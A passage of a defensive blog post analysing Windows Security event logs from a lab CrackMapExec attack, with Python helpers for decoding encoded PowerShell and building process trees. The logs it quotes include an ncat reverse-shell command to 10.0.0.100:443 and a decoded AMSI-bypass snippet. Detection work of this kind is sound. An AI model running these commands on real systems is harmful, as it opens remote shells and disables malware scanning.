 Logon Type:  3
 Restricted Admin Mode: -
 Virtual Account:  No
 Elevated Token:  Yes

Impersonation Level:  Impersonation

New Logon:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1
 Linked Logon ID:  0x0
 Network Account Name: -
 Network Account Domain: -
 Logon GUID:  {00000000-0000-0000-0000-000000000000}

Process Information:
 Process ID:  0x0
 Process Name:  -

Network Information:
 Workstation Name: -
 Source Network Address: 10.0.0.100
 Source Port:  37794

Detailed Authentication Information:
 Logon Process:  NtLmSsp 
 Authentication Package: NTLM
 Transited Services: -
 Package Name (NTLM only): NTLM V2
 Key Length:  128

Now that we have this new Logon ID of "0xB48AC1", we can set a filter to focus on the activity performed by this Logon ID. Let's push ahead to see what we can find of relevance.

Immediately after logon, we see below the "Administrator" account with Logon ID "0xB48AC1" creating a new "cmd.exe" process (Event ID 4688). Two things stand out. First, the Creator Process is "WmiPrvSE.exe", the WMI Provider Host: the command was launched through WMI (Win32_Process Create), which is how the wmiexec method of remote execution works, and cmd.exe being spawned by WmiPrvSE.exe is a strong detection signal on its own. Second, the "Process Command Line" references the file "Windows\Temp\kJpSGP" for which we saw the permission checks above. I find this command line interesting, so let's break it down.

Basically, the arguments to "cmd.exe" are as follows:
/Q - Turns echo off
/c - Carries out the command specified by the string and then terminates
cd \ - Changes to the root directory of the current drive (C:\ here)
1> - Redirects standard output (descriptor 1) to ...
... \\127.0.0.1\C$\Windows\Temp\kJpSGP - the file the output is written to; note it is reached through the C$ admin share on the loopback address rather than as a local path, which is why the share access events for this file show a Source Address of 127.0.0.1
2>&1 - Redirects standard error (descriptor 2) to wherever standard output is going, i.e. the same file "kJpSGP"

Now that we know what the command is about, let's press ahead.


04/18/2019 01:32:44 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=172550
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-20
 Account Name:  SECNIK-2K19$
 Account Domain:  SECURITYNIK
 Logon ID:  0x3E4

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1

Process Information:
 New Process ID:  0xe00
 New Process Name: C:\Windows\System32\cmd.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x12cc
 Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe
 Process Command Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\kJpSGP 2>&1

We then see the "cmd.exe" process above creating the "conhost.exe" process below.

04/18/2019 01:32:44 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=172551
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0x1040
 New Process Name: C:\Windows\System32\conhost.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0xe00
 Creator Process Name: C:\Windows\System32\cmd.exe
 Process Command Line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Next, on the loopback address (127.0.0.1), we see activity by Logon ID "0xB48AC1": cmd.exe writing its output file through the C$ share. The access check asks for READ_CONTROL (read the object's security descriptor), SYNCHRONIZE, WriteData, AppendData, WriteEA (write extended attributes), ReadAttributes and WriteAttributes (access mask 0x120196), i.e. the rights needed to create and write the file. Because the Source Address here is 127.0.0.1, a filter that excludes localhost, like the one used earlier, hides this step entirely.

04/18/2019 01:32:45 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=172566
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1

Network Information: 
 Object Type:  File
 Source Address:  127.0.0.1
 Source Port:  56094

Share Information:
 Share Name:  \\*\C$
 Share Path:  \??\C:\
 Relative Target Name: Windows\Temp\kJpSGP

Access Request Information:
 Access Mask:  0x120196
 Accesses:  READ_CONTROL
    SYNCHRONIZE
    WriteData (or AddFile)
    AppendData (or AddSubdirectory or CreatePipeInstance)
    WriteEA
    ReadAttributes
    WriteAttributes

Access Check Results:


Eventually, after some additional activity (excluded for brevity), we see a PowerShell command being executed by a "cmd.exe" process. Note this is not the same "cmd.exe" as above (the New Process ID differs), but the activity is all related: another "cmd.exe" was created by WmiPrvSE.exe under the same Logon ID, and there was no point in repeating what was already shown. If you have any concerns about this, do feel free to drop me a line.

Looking at the command line below, we see PowerShell being executed with "-exec bypass" (ignore the execution policy), "-window hidden", "-noni" (non-interactive), "-nop" (no profile) and "-encoded", so the script itself is not readable as-is.


04/18/2019 01:32:45 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=172584
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:

 Security ID:  S-1-5-20
 Account Name:  SECNIK-2K19$
 Account Domain:  SECURITYNIK
 Logon ID:  0x3E4

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1

Process Information:
 New Process ID:  0xa74
 New Process Name: C:\Windows\System32\cmd.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x12cc
 Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe
 Process Command Line: cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni -nop -encoded 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 1> \\127.0.0.1\C$\Windows\Temp\RvhXCV 2>&1


The encoded command line above is not a problem. It is Base64 encoded and can be decoded easily. To do this, let's copy the following string into a text file.


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

In my case I named the text file "securityNik-b64.encoded". Now that I have this file, I will leverage "certutil.exe" on my Windows 10 analysis machine to decode this text.


c:\Users\Security Nik>certutil -decode -f c:\tmp\securityNik-b64.encoded c:\tmp\securityNik-b64.decoded
Input Length = 632
Output Length = 472
CertUtil: -decode command completed successfully.

c:\Users\Security Nik>type c:\tmp\securityNik-b64.decoded
[ N e t . S e r v i c e P o i n t M a n a g e r ] : : S e r v e r C e r t i f i c a t e V a l i d a t i o n C a l l b a c k   =   { $ t r u e } ;
 t r y {
 [ R e f ] . A s s e m b l y . G e t T y p e ( ' S y s t e m . M a n a g e m e n t . A u t o m a t i o n . A m s i U t i l s ' ) . G e t F i e l d ( ' a m s i I n i t F a i l e d ' ,   ' N o n P u b l i c , S t a t i c ' ) . S e t V a l u e ( $ n u l l ,   $ t r u e )
 } c a t c h { }
 g e t - p r o c e s s

Ahhhh! Finally, we are able to see above the command which was executed. It took us a while to get here but we did. No need to worry about the spaces between the characters: the decoded text is Unicode (UTF-16), so each character is a 2 byte (16 bit) value, and the second, zero byte of each pair is what shows up as a space.
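The same decode done without certutil, as an added example that is not part of the original post: it pulls the base64 argument out of a 4688 command line of the shape shown above, decodes it as UTF-16LE, and checks the "every second byte is zero" property behind the spaces. The command line and encoded payload are constructed here from a harmless script; the names (extract_encoded, suspicious_switches and so on) are this example's own.

```python
import base64
import re

# Constructed sample in the shape of the 4688 command line above. The encoded
# payload is built here from a harmless script; the page's real blob is not reproduced.
SAMPLE_SCRIPT = "get-process\r\n"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = ("cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni -nop "
                  f"-encoded {SAMPLE_B64} 1> \\\\127.0.0.1\\C$\\Windows\\Temp\\RvhXCV 2>&1")

# powershell.exe also accepts abbreviations of -EncodedCommand; longest alternative first.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|encoded|enc|ec|e)\s+([A-Za-z0-9+/=]+)",
                          re.IGNORECASE)
# Switches that make the run quiet; together with -encoded they are worth alerting on.
SUSPICIOUS = ["-exec bypass", "-window hidden", "-noni", "-nop", "-encoded"]

def extract_encoded(cmdline):
    """Return the base64 argument of the encoded-command switch, or None."""
    m = ENCODED_FLAG.search(cmdline)
    return m.group(1) if m else None

def raw_bytes(b64):
    """What certutil -decode writes to disk: the decoded bytes, still UTF-16LE."""
    return base64.b64decode(b64)

def decode_encoded_command(b64):
    """-EncodedCommand is base64 over UTF-16LE text, so decode in two steps."""
    return raw_bytes(b64).decode("utf-16-le")

def high_bytes_are_null(b64):
    """True when every second byte is 0x00: for ASCII text each character is a
    16-bit value with a zero high byte, and that zero byte is the 'space' in the
    type output."""
    raw = raw_bytes(b64)
    return len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2])

def suspicious_switches(cmdline):
    """Which of the quiet-execution switches appear in the command line."""
    lowered = " ".join(cmdline.lower().split())
    return [s for s in SUSPICIOUS if s in lowered]

if __name__ == "__main__":
    b64 = extract_encoded(SAMPLE_CMDLINE)
    print("switches:", suspicious_switches(SAMPLE_CMDLINE))
    print("decoded :", decode_encoded_command(b64).strip())
```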

Finally, we see the account logoff for logon ID "0xB48AC1".


04/18/2019 01:33:01 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=172622
Keywords=Audit Success
Message=An account was logged off.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1

Logon Type:   3

Good stuff! We solved that challenge.

Let's move on to the last part of this post, in which "ncat.exe" was executed, and see what we might be able to learn from the logs. As we go through this section, note I'm leaving out some of the activities as they are similar to what we have seen above: for example, accessing the share "\\*\C$", creating and deleting temporary files such as "Windows\Temp\HxuzLk", and process command lines such as "cmd.exe /Q /c cd  1> \\127.0.0.1\C$\Windows\Temp\HxuzLk 2>&1". Rather than repeat what is above, let's instead focus on the more relevant items.

We see below that similar to the Powershell command, when the "netcat.exe" is executed below, it


04/18/2019 11:09:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196801
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-20
 Account Name:  SECNIK-2K19$
 Account Domain:  SECURITYNIK
 Logon ID:  0x3E4

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x426A10

Process Information:
 New Process ID:  0x8a8
 New Process Name: C:\Windows\System32\cmd.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x1164
 Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe
 Process Command Line: cmd.exe /Q /c c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \\127.0.0.1\C$\Windows\Temp\iKxsfQ 2>&1

At this point, since we have the log above, we are better off taking the logon ID "0x426A10" and searching for all activities associated with it. However, when I did this I did not find the "whoami" and "net users" log entries. As a result, I had to continue stepping through my logs, looking at the activities after the time above. As I stepped through, I recognized there were a number of logons and logoffs, which would explain why I did not see the "whoami" under this session, as every new session should generate a new logon ID. However, these logons still all display similar characteristics in the access they request and the files they create.

As I stepped through the logs, I recognized I had hit the jackpot. Let's walk through this.

The next log is where it all begins. Let's build our tree.

From below, the "cmd.exe" process with PID "0xb94" was created by the "WmiPrvSE.exe" process with PID "0x1bc".  The "cmd.exe" process has quite an interesting command line.


start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94)


04/18/2019 11:11:28 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196910
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-20
 Account Name:  SECNIK-2K19$
 Account Domain:  SECURITYNIK
 Logon ID:  0x3E4

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Process Information:
 New Process ID:  0xb94
 New Process Name: C:\Windows\System32\cmd.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x1bc
 Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe
 Process Command Line: cmd.exe /Q /c c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \\127.0.0.1\C$\Windows\Temp\vYsGjo 2>&1

As we look at the next log entry seen below, "cmd.exe" with PID "0xb94" has spawned "conhost.exe" with PID "0xb4".


start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> conhost.exe (0xb4)


04/18/2019 11:11:28 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196911
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0xb4
 New Process Name: C:\Windows\System32\conhost.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0xb94
 Creator Process Name: C:\Windows\System32\cmd.exe
 Process Command Line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Continuing our log analysis, we see below that the "cmd.exe" process with PID "0xb94" now spawns "c:\tools\ncat.exe" with PID "0x9e8". We can also see the "ncat.exe" connecting to a device at 10.0.0.100 on port 443. Interesting!


         -> ncat.exe (0x9e8)
        /
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> conhost.exe (0xb4)


04/18/2019 11:11:28 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196919
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0x9e8
 New Process Name: C:\Tools\ncat.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0xb94
 Creator Process Name: C:\Windows\System32\cmd.exe
 Process Command Line: c:\tools\ncat.exe  --nodns --exec cmd.exe 10.0.0.100 443 

Next we see the "ncat.exe" process with PID "0x9e8" spawning a shell, "cmd.exe", with PID "0xb4c".


         -> ncat.exe (0x9e8) -> cmd.exe (0xb4c)
        /
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> conhost.exe (0xb4)


04/18/2019 11:11:28 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196925
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0xb4c
 New Process Name: C:\Windows\SysWOW64\cmd.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x9e8
 Creator Process Name: C:\Tools\ncat.exe
 Process Command Line: cmd.exe

Looking below, we now see the "cmd.exe" process with PID "0xb4c" spawning a process named "whoami.exe" with PID "0xe60".


         -> ncat.exe (0x9e8) -> cmd.exe (0xb4c) -> whoami.exe (0xe60)
        /
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> conhost.exe (0xb4)


04/18/2019 11:11:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196959
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0
 
Process Information:
 New Process ID:  0xe60
 New Process Name: C:\Windows\SysWOW64\whoami.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0xb4c
 Creator Process Name: C:\Windows\SysWOW64\cmd.exe
 Process Command Line: whoami

Next up we see below the "cmd.exe" process with PID "0xb4c" executing the "net.exe" process with PID "0x13f0". Notice the command line for this is executing "net users".


                 -> net.exe (0x13f0)
                /
         -> ncat.exe (0x9e8) -> cmd.exe (0xb4c) -> whoami.exe (0xe60)
        /
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> conhost.exe (0xb4)


04/18/2019 11:11:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196966
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0x13f0
 New Process Name: C:\Windows\SysWOW64\net.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0xb4c
 Creator Process Name: C:\Windows\SysWOW64\cmd.exe
 Process Command Line: net  users

Finally, we see the "net.exe" process with PID "0x13f0" spawning the "net1.exe" process with PID "0x570".


                 -> net.exe (0x13f0) -> net1.exe (0x570)
                /
         -> ncat.exe (0x9e8) -> cmd.exe (0xb4c) -> whoami.exe (0xe60)
        /
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> conhost.exe (0xb4)


04/18/2019 11:11:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=196967
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x43115C

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0x570
 New Process Name: C:\Windows\SysWOW64\net1.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x13f0
 Creator Process Name: C:\Windows\SysWOW64\net.exe
 Process Command Line: C:\Windows\system32\net1  users

Ok! So now we have a reasonable amount of intelligence into how we can use our logs to see the activity crackmapexec performs on a system. Obviously, you will need to have the appropriate level of logging in place to make the most of this.
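The tree built by hand above, as an added example that is not part of the original post: it links the 4688 events through their Creator Process ID / New Process ID fields, prints the chain for any PID, and flags discovery commands (whoami, net) whose ancestry starts at WmiPrvSE.exe, which is the shape this WMI-driven activity leaves in the logs. The event records are constructed here from the PIDs and image paths shown above; the function names are this example's own.

```python
# Constructed sample from the 4688 events walked through above, PIDs as on the page:
# (new PID, new image, creator PID, creator image); command lines are left out.
EVENTS = [
    ("0xb94", r"C:\Windows\System32\cmd.exe", "0x1bc", r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    ("0xb4", r"C:\Windows\System32\conhost.exe", "0xb94", r"C:\Windows\System32\cmd.exe"),
    ("0x9e8", r"C:\Tools\ncat.exe", "0xb94", r"C:\Windows\System32\cmd.exe"),
    ("0xb4c", r"C:\Windows\SysWOW64\cmd.exe", "0x9e8", r"C:\Tools\ncat.exe"),
    ("0xe60", r"C:\Windows\SysWOW64\whoami.exe", "0xb4c", r"C:\Windows\SysWOW64\cmd.exe"),
    ("0x13f0", r"C:\Windows\SysWOW64\net.exe", "0xb4c", r"C:\Windows\SysWOW64\cmd.exe"),
    ("0x570", r"C:\Windows\SysWOW64\net1.exe", "0x13f0", r"C:\Windows\SysWOW64\net.exe"),
]
DISCOVERY = {"whoami.exe", "net.exe", "net1.exe"}  # host/account discovery binaries

def base(image):
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()  # e.g. 'wmiprvse.exe'

def build_tree(events):
    """Map each PID to its creator, each creator to its children, and PIDs to names."""
    parent, children, names = {}, {}, {}
    for pid, image, ppid, pimage in events:
        parent[pid] = ppid
        names[pid] = base(image)
        names.setdefault(ppid, base(pimage))  # creator may have no 4688 of its own
        children.setdefault(ppid, []).append(pid)
    return parent, children, names

def ancestry(events, pid):
    """Image names from the oldest known ancestor down to pid."""
    parent, _, names = build_tree(events)
    chain = [names[pid]]
    while pid in parent:
        pid = parent[pid]
        chain.append(names[pid])
    return chain[::-1]

def render(events, root):
    """The tree drawn in the post, as indented 'name (pid)' lines under root."""
    _, children, names = build_tree(events)
    lines = []
    def walk(pid, depth):
        lines.append("  " * depth + f"{names[pid]} ({pid})")
        for child in children.get(pid, []):
            walk(child, depth + 1)
    walk(root, 0)
    return lines

def discovery_under_wmi(events):
    """PIDs of discovery commands whose chain starts at WmiPrvSE.exe (WMI exec)."""
    return [pid for pid, *_ in events
            if (c := ancestry(events, pid))[0] == "wmiprvse.exe" and c[-1] in DISCOVERY]
```

Run `print("\n".join(render(EVENTS, "0x1bc")))` to see the indented tree; `discovery_under_wmi(EVENTS)` returns the whoami, net and net1 PIDs.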

See the rest of the posts below on how we do raw packet analysis leveraging "tshark", along with using tools such as Snort and Bro ... sorry, Zeek.



Posts in this series:
Having Fun with CrackMapExec
Having Fun with CrackMapExec - Log Analysis
Having Fun with CrackMapExec - Packet Analysis - CrackMapExec
Having Fun with CrackMapExec - Zeek (Bro) Analysis
Having Fun with CrackMapExec - Snort IDS/IPS Analysis
